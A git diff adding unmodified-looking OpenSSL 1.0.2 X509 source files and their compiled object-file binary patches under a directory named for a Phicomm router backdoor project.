z({r1$3U*~EE-0#{4bQ3zdZ9i=O2*@n(@$7VGHkqmp%wbFjuOxLfb2Qh)wV}h$UZ@=
z1$<6|Y|g`V;`$A!-zOBNocNI3kpkEJ*Z7Q##rMj}t~P#tR=bbbWSNsesB@k08lT94
z>z+Bsv0SEjo@e=;9T<?*@gvFcjADJO?FTugR48@cf5uOwg06aef&k}_{q=Z9PDJHD
zNd?96n1B4+a6IQf>e=|Lcl7)uNj%TVh<IF6&%H$O0bfeCZ=pCG_5H*DT2%addjDsK
Jk)fi;{{@F$R;B;|

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_err.c
new file mode 100644
index 0000000..43cde18
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_err.c
@@ -0,0 +1,186 @@
+/* crypto/x509/x509_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2012 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/x509.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_X509,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_X509,0,reason)
+
+static ERR_STRING_DATA X509_str_functs[] = {
+    {ERR_FUNC(X509_F_ADD_CERT_DIR), "ADD_CERT_DIR"},
+    {ERR_FUNC(X509_F_BY_FILE_CTRL), "BY_FILE_CTRL"},
+    {ERR_FUNC(X509_F_CHECK_POLICY), "CHECK_POLICY"},
+    {ERR_FUNC(X509_F_DIR_CTRL), "DIR_CTRL"},
+    {ERR_FUNC(X509_F_GET_CERT_BY_SUBJECT), "GET_CERT_BY_SUBJECT"},
+    {ERR_FUNC(X509_F_NETSCAPE_SPKI_B64_DECODE), "NETSCAPE_SPKI_b64_decode"},
+    {ERR_FUNC(X509_F_NETSCAPE_SPKI_B64_ENCODE), "NETSCAPE_SPKI_b64_encode"},
+    {ERR_FUNC(X509_F_X509AT_ADD1_ATTR), "X509at_add1_attr"},
+    {ERR_FUNC(X509_F_X509V3_ADD_EXT), "X509v3_add_ext"},
+    {ERR_FUNC(X509_F_X509_ATTRIBUTE_CREATE_BY_NID),
+     "X509_ATTRIBUTE_create_by_NID"},
+    {ERR_FUNC(X509_F_X509_ATTRIBUTE_CREATE_BY_OBJ),
+     "X509_ATTRIBUTE_create_by_OBJ"},
+    {ERR_FUNC(X509_F_X509_ATTRIBUTE_CREATE_BY_TXT),
+     "X509_ATTRIBUTE_create_by_txt"},
+    {ERR_FUNC(X509_F_X509_ATTRIBUTE_GET0_DATA), "X509_ATTRIBUTE_get0_data"},
+    {ERR_FUNC(X509_F_X509_ATTRIBUTE_SET1_DATA), "X509_ATTRIBUTE_set1_data"},
+    {ERR_FUNC(X509_F_X509_CHECK_PRIVATE_KEY), "X509_check_private_key"},
+    {ERR_FUNC(X509_F_X509_CRL_DIFF), "X509_CRL_diff"},
+    {ERR_FUNC(X509_F_X509_CRL_PRINT_FP), "X509_CRL_print_fp"},
+    {ERR_FUNC(X509_F_X509_EXTENSION_CREATE_BY_NID),
+     "X509_EXTENSION_create_by_NID"},
+    {ERR_FUNC(X509_F_X509_EXTENSION_CREATE_BY_OBJ),
+     "X509_EXTENSION_create_by_OBJ"},
+    {ERR_FUNC(X509_F_X509_GET_PUBKEY_PARAMETERS),
+     "X509_get_pubkey_parameters"},
+    {ERR_FUNC(X509_F_X509_LOAD_CERT_CRL_FILE), "X509_load_cert_crl_file"},
+    {ERR_FUNC(X509_F_X509_LOAD_CERT_FILE), "X509_load_cert_file"},
+    {ERR_FUNC(X509_F_X509_LOAD_CRL_FILE), "X509_load_crl_file"},
+    {ERR_FUNC(X509_F_X509_NAME_ADD_ENTRY), "X509_NAME_add_entry"},
+    {ERR_FUNC(X509_F_X509_NAME_ENTRY_CREATE_BY_NID),
+     "X509_NAME_ENTRY_create_by_NID"},
+    {ERR_FUNC(X509_F_X509_NAME_ENTRY_CREATE_BY_TXT),
+     "X509_NAME_ENTRY_create_by_txt"},
+    {ERR_FUNC(X509_F_X509_NAME_ENTRY_SET_OBJECT),
+     "X509_NAME_ENTRY_set_object"},
+    {ERR_FUNC(X509_F_X509_NAME_ONELINE), "X509_NAME_oneline"},
+    {ERR_FUNC(X509_F_X509_NAME_PRINT), "X509_NAME_print"},
+    {ERR_FUNC(X509_F_X509_PRINT_EX_FP), "X509_print_ex_fp"},
+    {ERR_FUNC(X509_F_X509_PUBKEY_GET), "X509_PUBKEY_get"},
+    {ERR_FUNC(X509_F_X509_PUBKEY_SET), "X509_PUBKEY_set"},
+    {ERR_FUNC(X509_F_X509_REQ_CHECK_PRIVATE_KEY),
+     "X509_REQ_check_private_key"},
+    {ERR_FUNC(X509_F_X509_REQ_PRINT_EX), "X509_REQ_print_ex"},
+    {ERR_FUNC(X509_F_X509_REQ_PRINT_FP), "X509_REQ_print_fp"},
+    {ERR_FUNC(X509_F_X509_REQ_TO_X509), "X509_REQ_to_X509"},
+    {ERR_FUNC(X509_F_X509_STORE_ADD_CERT), "X509_STORE_add_cert"},
+    {ERR_FUNC(X509_F_X509_STORE_ADD_CRL), "X509_STORE_add_crl"},
+    {ERR_FUNC(X509_F_X509_STORE_CTX_GET1_ISSUER),
+     "X509_STORE_CTX_get1_issuer"},
+    {ERR_FUNC(X509_F_X509_STORE_CTX_INIT), "X509_STORE_CTX_init"},
+    {ERR_FUNC(X509_F_X509_STORE_CTX_NEW), "X509_STORE_CTX_new"},
+    {ERR_FUNC(X509_F_X509_STORE_CTX_PURPOSE_INHERIT),
+     "X509_STORE_CTX_purpose_inherit"},
+    {ERR_FUNC(X509_F_X509_TO_X509_REQ), "X509_to_X509_REQ"},
+    {ERR_FUNC(X509_F_X509_TRUST_ADD), "X509_TRUST_add"},
+    {ERR_FUNC(X509_F_X509_TRUST_SET), "X509_TRUST_set"},
+    {ERR_FUNC(X509_F_X509_VERIFY_CERT), "X509_verify_cert"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA X509_str_reasons[] = {
+    {ERR_REASON(X509_R_AKID_MISMATCH), "akid mismatch"},
+    {ERR_REASON(X509_R_BAD_X509_FILETYPE), "bad x509 filetype"},
+    {ERR_REASON(X509_R_BASE64_DECODE_ERROR), "base64 decode error"},
+    {ERR_REASON(X509_R_CANT_CHECK_DH_KEY), "cant check dh key"},
+    {ERR_REASON(X509_R_CERT_ALREADY_IN_HASH_TABLE),
+     "cert already in hash table"},
+    {ERR_REASON(X509_R_CRL_ALREADY_DELTA), "crl already delta"},
+    {ERR_REASON(X509_R_CRL_VERIFY_FAILURE), "crl verify failure"},
+    {ERR_REASON(X509_R_ERR_ASN1_LIB), "err asn1 lib"},
+    {ERR_REASON(X509_R_IDP_MISMATCH), "idp mismatch"},
+    {ERR_REASON(X509_R_INVALID_DIRECTORY), "invalid directory"},
+    {ERR_REASON(X509_R_INVALID_FIELD_NAME), "invalid field name"},
+    {ERR_REASON(X509_R_INVALID_TRUST), "invalid trust"},
+    {ERR_REASON(X509_R_ISSUER_MISMATCH), "issuer mismatch"},
+    {ERR_REASON(X509_R_KEY_TYPE_MISMATCH), "key type mismatch"},
+    {ERR_REASON(X509_R_KEY_VALUES_MISMATCH), "key values mismatch"},
+    {ERR_REASON(X509_R_LOADING_CERT_DIR), "loading cert dir"},
+    {ERR_REASON(X509_R_LOADING_DEFAULTS), "loading defaults"},
+    {ERR_REASON(X509_R_METHOD_NOT_SUPPORTED), "method not supported"},
+    {ERR_REASON(X509_R_NEWER_CRL_NOT_NEWER), "newer crl not newer"},
+    {ERR_REASON(X509_R_NO_CERT_SET_FOR_US_TO_VERIFY),
+     "no cert set for us to verify"},
+    {ERR_REASON(X509_R_NO_CRL_NUMBER), "no crl number"},
+    {ERR_REASON(X509_R_PUBLIC_KEY_DECODE_ERROR), "public key decode error"},
+    {ERR_REASON(X509_R_PUBLIC_KEY_ENCODE_ERROR), "public key encode error"},
+    {ERR_REASON(X509_R_SHOULD_RETRY), "should retry"},
+    {ERR_REASON(X509_R_UNABLE_TO_FIND_PARAMETERS_IN_CHAIN),
+     "unable to find parameters in chain"},
+    {ERR_REASON(X509_R_UNABLE_TO_GET_CERTS_PUBLIC_KEY),
+     "unable to get certs public key"},
+    {ERR_REASON(X509_R_UNKNOWN_KEY_TYPE), "unknown key type"},
+    {ERR_REASON(X509_R_UNKNOWN_NID), "unknown nid"},
+    {ERR_REASON(X509_R_UNKNOWN_PURPOSE_ID), "unknown purpose id"},
+    {ERR_REASON(X509_R_UNKNOWN_TRUST_ID), "unknown trust id"},
+    {ERR_REASON(X509_R_UNSUPPORTED_ALGORITHM), "unsupported algorithm"},
+    {ERR_REASON(X509_R_WRONG_LOOKUP_TYPE), "wrong lookup type"},
+    {ERR_REASON(X509_R_WRONG_TYPE), "wrong type"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_X509_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(X509_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, X509_str_functs);
+        ERR_load_strings(0, X509_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..a006b7cd702e9c28e6ebb52749afed37d2457131
GIT binary patch
literal 1368
zcmbtS%}T>S5S|#dRSQ<}AXKD!QPD1`KZqWrAk~X_C=_~;lD4rGo3tcbs2=nc`Y1j^
z!I$tc6mMR1rrAxmYemq3$;^D2Z+>?7F@JG3VHhCAfD;%-5(Owt4E@}|%|Qa@;C+7e
z;~CCRPmj}^#Y)HHo%9jgV^$`6*cpV`hh2+V`&%IllgLe?PNAM(76Hrl2{TbimO=x@
zeF2Pa(nuv@@g5FD_=@;P+~0(Dn1r{_ae3z04QU2tNrh-e(<vaj=3t9aj3N`Jzk>rj
z_5)5QFe(WQ7nM1qox2CtQQ7f*R)u__P;R#DTDe46!2KJq9*8n&VQHh0typm9a=QWy
z^F!N^9(TGNSk2}(uu2dBtF~O%@euP`++lcKnSk5XTM^g24r}|Zw&U|VV7}9|nbRm=
z`?l+d=KnA$<kB7LCz%s9qw^54{$|$@CrrL8kp_9`XjbQM;Qu)4U->)8rJ5G1Dzg8!
z3ZgIjOM9STYHC{z6kqZrM1APBjodxPlAlIj71~vmD-5Wn&hLpNeJ`C~!aRD_Igu~T
zix_lS05fQ5PRW<}xZXtR(+A}>G%$;nYUq5z^t&U<ljy%rfg%EqkOlO{@n1z^J<1Fn
Go&N>7m`|_(

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_ext.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_ext.c
new file mode 100644
index 0000000..fb4e311
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_ext.c
@@ -0,0 +1,211 @@
+/* crypto/x509/x509_ext.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/stack.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+int X509_CRL_get_ext_count(X509_CRL *x)
+{
+    return (X509v3_get_ext_count(x->crl->extensions));
+}
+
+int X509_CRL_get_ext_by_NID(X509_CRL *x, int nid, int lastpos)
+{
+    return (X509v3_get_ext_by_NID(x->crl->extensions, nid, lastpos));
+}
+
+int X509_CRL_get_ext_by_OBJ(X509_CRL *x, ASN1_OBJECT *obj, int lastpos)
+{
+    return (X509v3_get_ext_by_OBJ(x->crl->extensions, obj, lastpos));
+}
+
+int X509_CRL_get_ext_by_critical(X509_CRL *x, int crit, int lastpos)
+{
+    return (X509v3_get_ext_by_critical(x->crl->extensions, crit, lastpos));
+}
+
+X509_EXTENSION *X509_CRL_get_ext(X509_CRL *x, int loc)
+{
+    return (X509v3_get_ext(x->crl->extensions, loc));
+}
+
+X509_EXTENSION *X509_CRL_delete_ext(X509_CRL *x, int loc)
+{
+    return (X509v3_delete_ext(x->crl->extensions, loc));
+}
+
+void *X509_CRL_get_ext_d2i(X509_CRL *x, int nid, int *crit, int *idx)
+{
+    return X509V3_get_d2i(x->crl->extensions, nid, crit, idx);
+}
+
+int X509_CRL_add1_ext_i2d(X509_CRL *x, int nid, void *value, int crit,
+                          unsigned long flags)
+{
+    return X509V3_add1_i2d(&x->crl->extensions, nid, value, crit, flags);
+}
+
+int X509_CRL_add_ext(X509_CRL *x, X509_EXTENSION *ex, int loc)
+{
+    return (X509v3_add_ext(&(x->crl->extensions), ex, loc) != NULL);
+}
+
+int X509_get_ext_count(X509 *x)
+{
+    return (X509v3_get_ext_count(x->cert_info->extensions));
+}
+
+int X509_get_ext_by_NID(X509 *x, int nid, int lastpos)
+{
+    return (X509v3_get_ext_by_NID(x->cert_info->extensions, nid, lastpos));
+}
+
+int X509_get_ext_by_OBJ(X509 *x, ASN1_OBJECT *obj, int lastpos)
+{
+    return (X509v3_get_ext_by_OBJ(x->cert_info->extensions, obj, lastpos));
+}
+
+int X509_get_ext_by_critical(X509 *x, int crit, int lastpos)
+{
+    return (X509v3_get_ext_by_critical
+            (x->cert_info->extensions, crit, lastpos));
+}
+
+X509_EXTENSION *X509_get_ext(X509 *x, int loc)
+{
+    return (X509v3_get_ext(x->cert_info->extensions, loc));
+}
+
+X509_EXTENSION *X509_delete_ext(X509 *x, int loc)
+{
+    return (X509v3_delete_ext(x->cert_info->extensions, loc));
+}
+
+int X509_add_ext(X509 *x, X509_EXTENSION *ex, int loc)
+{
+    return (X509v3_add_ext(&(x->cert_info->extensions), ex, loc) != NULL);
+}
+
+void *X509_get_ext_d2i(X509 *x, int nid, int *crit, int *idx)
+{
+    return X509V3_get_d2i(x->cert_info->extensions, nid, crit, idx);
+}
+
+int X509_add1_ext_i2d(X509 *x, int nid, void *value, int crit,
+                      unsigned long flags)
+{
+    return X509V3_add1_i2d(&x->cert_info->extensions, nid, value, crit,
+                           flags);
+}
+
+int X509_REVOKED_get_ext_count(X509_REVOKED *x)
+{
+    return (X509v3_get_ext_count(x->extensions));
+}
+
+int X509_REVOKED_get_ext_by_NID(X509_REVOKED *x, int nid, int lastpos)
+{
+    return (X509v3_get_ext_by_NID(x->extensions, nid, lastpos));
+}
+
+int X509_REVOKED_get_ext_by_OBJ(X509_REVOKED *x, ASN1_OBJECT *obj,
+                                int lastpos)
+{
+    return (X509v3_get_ext_by_OBJ(x->extensions, obj, lastpos));
+}
+
+int X509_REVOKED_get_ext_by_critical(X509_REVOKED *x, int crit, int lastpos)
+{
+    return (X509v3_get_ext_by_critical(x->extensions, crit, lastpos));
+}
+
+X509_EXTENSION *X509_REVOKED_get_ext(X509_REVOKED *x, int loc)
+{
+    return (X509v3_get_ext(x->extensions, loc));
+}
+
+X509_EXTENSION *X509_REVOKED_delete_ext(X509_REVOKED *x, int loc)
+{
+    return (X509v3_delete_ext(x->extensions, loc));
+}
+
+int X509_REVOKED_add_ext(X509_REVOKED *x, X509_EXTENSION *ex, int loc)
+{
+    return (X509v3_add_ext(&(x->extensions), ex, loc) != NULL);
+}
+
+void *X509_REVOKED_get_ext_d2i(X509_REVOKED *x, int nid, int *crit, int *idx)
+{
+    return X509V3_get_d2i(x->extensions, nid, crit, idx);
+}
+
+int X509_REVOKED_add1_ext_i2d(X509_REVOKED *x, int nid, void *value, int crit,
+                              unsigned long flags)
+{
+    return X509V3_add1_i2d(&x->extensions, nid, value, crit, flags);
+}
+
+IMPLEMENT_STACK_OF(X509_EXTENSION)
+
+IMPLEMENT_ASN1_SET_OF(X509_EXTENSION)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_ext.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_ext.o
new file mode 100644
index 0000000000000000000000000000000000000000..0ef7c89493f3ac757cb012828ee44aabd971222e
GIT binary patch
literal 5304
zcmchaU1(fI6vt<iXttUrt5&Tv$cjZGwwKL^XiC-1$0loBlO?vL_`!C++C(=WY;I&D
z!3L|P5CxG6J{0VOVv#(mRLDcXhxQ@9^`Q@W5Ff-sAC&k|B~Z_qd(P(U$t;K!56qpJ
z-~7+anYs7QoqIZw8fplI3|q)NZ?<bpjj7zXU5?vg-0U_jX0z?lzmm(%$>mDy2IBvx
z{zCH1mF@A;$z=<E#Q<JSez4Z|=~~-&Yd>tql2oz%cXb*&`On72Fy+{%BO<UntfZmu
zh&v3~Gl=Y%W_V!WP_*M{ZhqRIkM?@qUhH7!GxN6E`EFOti}gGiU|dzx1StaPE=a?p
zM@@q<YseZQq3sDW6MARdgesBHzLw_j$M7JbPdl|?84dH8Ed^y}gAR7w!AcIc<Y4C=
z?2=*__bM?PXQDOoa%<Secui?BZo9yc%eibhbP;-qq;9{1J*ybTlOm?$DJU)WU2(7v
ziR~6~U39Q-9PFxtZ8+F(iecPM@KB&Vf)`lF5n9J~;xe9?V(8*B9Hz<qe%sa7=-jFB
zndGOk)~nGz#kCA;jppv1(DLRwJY0w4+fi#RP`zKo$<M>%z_~0vdh75}>W6(eKUqh=
zNct$`Xskak%C><nUqg;@#;DHvD^TY$HQDTExS~EzkTsi7=Q1_ftO0H$>eEX95O9~i
zgY+kq{<%7Od}px#S*6d_(U(cTM0)$KLHSG_{U@Zqp!)xk_=@7+6JJ&QN8;;>|3Z92
z@lE146>o(12j{y*yq(*L?*%_JUfair<GM=TO`P{3en&@%CrHoyP2%H<pCz7A{43%m
z#aD?hD1MFjS>kptfq-ui|6J)C;8n+USW(<mo{sfqiWT3>o8wp<7*AzR6@5gR{0w~b
zOlCMW*58-Pj13LFk~oq%($}9#WUTn@ZYAB(LvA56`r@D#3tBTC@Ui|8hnlHY=gX7+
zWIkJRxYRUBKc%%*+g>P^ihdC%&JsmrFPTEuq?H{D)_|*4lPwfF?E+4A6<A~$*I6Y8
z13|UwT2{U(a`6PKE|FlhYd{Ubg!R;%qgN-jV?vqn#IdoL5`(Tlb(0L((N+!I(N;SF
zB?u<MP)~??&BPe;8dWFA4K)+R_x~fjfZ-W#AEd3@f$gIANOL^Pp=plaH#Fq;LgIdS
zKSGXs2lE3^Mnm2PiTPoKV94=TgLw)e81e@oF@GH)81e@pF)twmL;f%%=8FiykmH`h
zoX>;EW&D?+j)q*uf7Q}}%lNMgF5~C(BK9NWza{iCem*0jUdG=e)?dcoC%BA%RB##p
zYl6%8Cj^)A&kHW&e@}23|0Tg?{ND;L<B!rh!1j*+6jke?5_A5JB^8fSou3ER$B6TJ
zfO(ww`;;?JQ~fi=Pf&eDaqf3b@g=JB^T7RIAbwNnxnKB%S!4Yw>GmkTPMp8vtluDh
zSm}AZwBlQ&=ljn6@VQ}8>3KZf2UySNhA)(!&kdIq=X1ll;(TuSNpU_m{Gm9X8^Ra}
z7{|lshN$9vZs<{*&ke?#TbS~*ImrETkWX-_Tr6chAHSboA?s(2mz$e2UVdh3stCsj
zZ+gZrdhkztaL&)>-=g}d>3MIqJTqG?`wPaiJrpN0C(GHXVi52hUZdcTOQQc=;=s`G
z{3%UU?VgW&Ok9efd<!=buyeFd_dpqa!wA9l2AO#Ra^(6?>rXup=`}t89Q*vY{+-~9
zee!z_MQc3%Qw%8Q@i{*PoXb+WpXMzYmbG>S82%k<c?W?gv`ORjW0r#g_No1o1mdbe
z`@aFcuKTyt8jK+CANsOC-#^#b=y?u11xr(okHaoV+8>#|cYw@w61J;Gy?*$OQ4(}F
OVQc^^1zGi~{r?8)n;ohE

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_lu.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_lu.c
new file mode 100644
index 0000000..ff1fa97
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_lu.c
@@ -0,0 +1,710 @@
+/* crypto/x509/x509_lu.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/lhash.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+X509_LOOKUP *X509_LOOKUP_new(X509_LOOKUP_METHOD *method)
+{
+    X509_LOOKUP *ret;
+
+    ret = (X509_LOOKUP *)OPENSSL_malloc(sizeof(X509_LOOKUP));
+    if (ret == NULL)
+        return NULL;
+
+    ret->init = 0;
+    ret->skip = 0;
+    ret->method = method;
+    ret->method_data = NULL;
+    ret->store_ctx = NULL;
+    if ((method->new_item != NULL) && !method->new_item(ret)) {
+        OPENSSL_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void X509_LOOKUP_free(X509_LOOKUP *ctx)
+{
+    if (ctx == NULL)
+        return;
+    if ((ctx->method != NULL) && (ctx->method->free != NULL))
+        (*ctx->method->free) (ctx);
+    OPENSSL_free(ctx);
+}
+
+int X509_LOOKUP_init(X509_LOOKUP *ctx)
+{
+    if (ctx->method == NULL)
+        return 0;
+    if (ctx->method->init != NULL)
+        return ctx->method->init(ctx);
+    else
+        return 1;
+}
+
